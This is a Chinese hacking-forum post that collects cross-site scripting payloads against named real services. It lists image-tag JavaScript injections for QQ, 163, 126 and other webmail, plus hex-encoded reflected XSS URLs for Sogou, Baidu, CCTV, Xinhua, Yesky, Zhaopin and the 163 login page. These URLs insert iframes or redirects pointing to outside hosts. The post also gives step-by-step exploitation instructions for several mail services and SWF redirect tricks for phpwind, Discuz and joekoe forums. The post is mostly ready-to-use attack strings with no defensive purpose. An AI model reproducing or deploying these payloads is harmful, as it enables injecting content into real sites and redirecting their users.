|
|
你还没有登录,登录后可以看到更多精彩内容
您需要 登录 才可以下载或查看,没有账号?新成员注册
×
qq邮件: 以下是代码片段:<img src=javascript:document.write('<iframe%20src=http://hi.baidu.com/jc123%20width=500%20height=550%3e</iframe%3e')>
163邮件: 以下是代码片段:<img src=j avascript:document.write('%3ciframe%20src=http://hi.baidu.com/jc123%20width=500%20height=550%3e%3c/iframe%3e')>
126邮件也适用与q邮箱: 以下是代码片段:<img src=javascript:document.write('
<iframe%20src=http://hi.baidu.com/jc123%20width=500%20height=550%3e</iframe%3e')>
其他邮箱请参考hackest&雕牌 [h.s.t]的“对国内主流邮箱的跨站测试”一文
另外是一些跨站漏洞(作者在另一主题中提交被管理人员合并进来)
sogou:
以下是代码片段:http://www.sogou.com/web?query=%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%68%61%63%6b%31%30%30%2e%63%6e%22%20%77%69%64%74%68%3d%22%39%30%30%22%20%68%65%69%67%68%74%3d%22%31%35%30%30%22%3e%3c%2f%69%66%72%61%6d%65%3e
openv:
以下是代码片段:http://www.openv.tv/ls.jsp?q=%3c%2f%74%69%74%6c%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%77%77%2e%68%61%63%6b%31%30%30%2e%63%6e%20%77%69%64%74%68%3d%22%39%30%30%22%20%68%65%69%67%68%74%3d%22%39%30%30%22%3e&db=video
新华网视频搜索也是openv的
以下是代码片段:http://xinhuanet.openv.tv/search.jsp?q=%3c%2f%74%69%74%6c%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%68%69%2e%62%61%69%64%75%2e%63%6f%6d%2f%6a%63%31%32%33%3e&md=&lang=&sn=1&vd=&d=v&db=tv&s
cctv 好像有人发过了)
以下是代码片段:http://vsearch.cctv.com/tvsearch.jsp?q=%3c%2f%74%69%74%6c%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%68%69%2e%62%61%69%64%75%2e%63%6f%6d%2f%6a%63%31%32%33%3e
tom:
以下是代码片段:http://search.tom.com/ci.php?word=%3c%2f%74%69%74%6c%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%77%77%2e%68%61%63%6b%31%30%30%2e%63%6e%3e
百度:
以下是代码片段:http://cache.baidu.com/c?url=%68%74%74%70%3a%2f%2f%68%69%2e%62%61%69%64%75%2e%63%6f%6d%2f%6a%63%31%32%33&p=2007c64ad6c02dec05bd9b7e000000
http://www.baidu.com/s?wd=><script>window.location=('http://hi.baidu.com/jc123')</script>
163好像也有人发过了)
以下是代码片段:https://reg.163.com/logins.jsp?username=%22%22%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%68%69%2e%62%61%69%64%75%2e%63%6f%6d%2f%6a%63%31%32%33%3e%3c%2f%69%66%72%61%6d%65%3e%22%3c%22&password=123456
天极网:
以下是代码片段:http://search.yesky.com/search.do?stype=0&wd=%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%68%61%63%6b%31%30%30%2e%63%6e%22%20%77%69%64%74%68%3d%22%39%30%30%22%20%68%65%69%67%68%74%3d%22%31%35%30%30%22%3e%3c%2f%69%66%72%61%6d%65%3e
智联招聘:
以下是代码片段:http://student.zhaopin.com/job/companylist.asp?c=%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%68%61%63%6b%31%30%30%2e%63%6e%22%20%77%69%64%74%68%3d%22%39%30%30%22%20%68%65%69%67%68%74%3d%22%31%35%30%30%22%3e%3c%2f%69%66%72%61%6d%65%3e
很久以前[b.s.t]团队就对这个发生了渗透以及讨论..
如题:http://hi.baidu.com/b_s_t/blog/item/2404052e8d0486514ec22676.html
群里讨论过这些..现在好象 以下是代码片段:<img src=javascript:document.write('<iframe%20src=http://hi.baidu.com/jc123%20width=500%20height=550%3e</iframe%3e')>
已经被过滤,,,只测试了下qq mail...
刚试了下qq邮箱这个还能用 以下是代码片段:<img src=javascript:document.write('
<iframe%20src=http://hi.baidu.com/jc123%20width=500%20height=550%3e</iframe%3e')>
以下是会员“搁浅”补充的内容。
21cn邮箱:
利用方法:风格设为为"左右"—"写信"—"插入图片",在弹出的框里输入跨站代码即可。
新浪邮箱:
利用方法:"写信"—"插入图片",在弹出的框里输入跨站代码即可。
tom邮箱:
利用方法:"写信"—"编辑html信件",再勾选上"编辑源码",输入跨站代码即可。
sohu邮箱:
利用方法:直接发送即可,但要回复才能看见效果。
同时还适合于更多邮箱
bbs的直接跨站漏洞(swf跳转)
phpwind论坛的跨站代码: 以下是代码片段:
[wmv]http://www.aground.cn/gq.swf?url=输入你要跨的地址[/wmv]
(注意:因过滤问题,请删除第一个[ wmv]的空格)
discuz论坛的跨站代码: 以下是代码片段:http://www.aground.cn/gq.swf?url=输入你要跨的地址
joekoe论坛的跨站代码: 以下是代码片段:[qt=450,350]http://www.aground.cn/gq.swf?url=输入你要跨的地址[/qt]
同时适合于更多论坛,只要灵活运用就可以了。
|
|
功勋会币
赞助网站建设
赞助活动
IP卡
狗仔卡
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡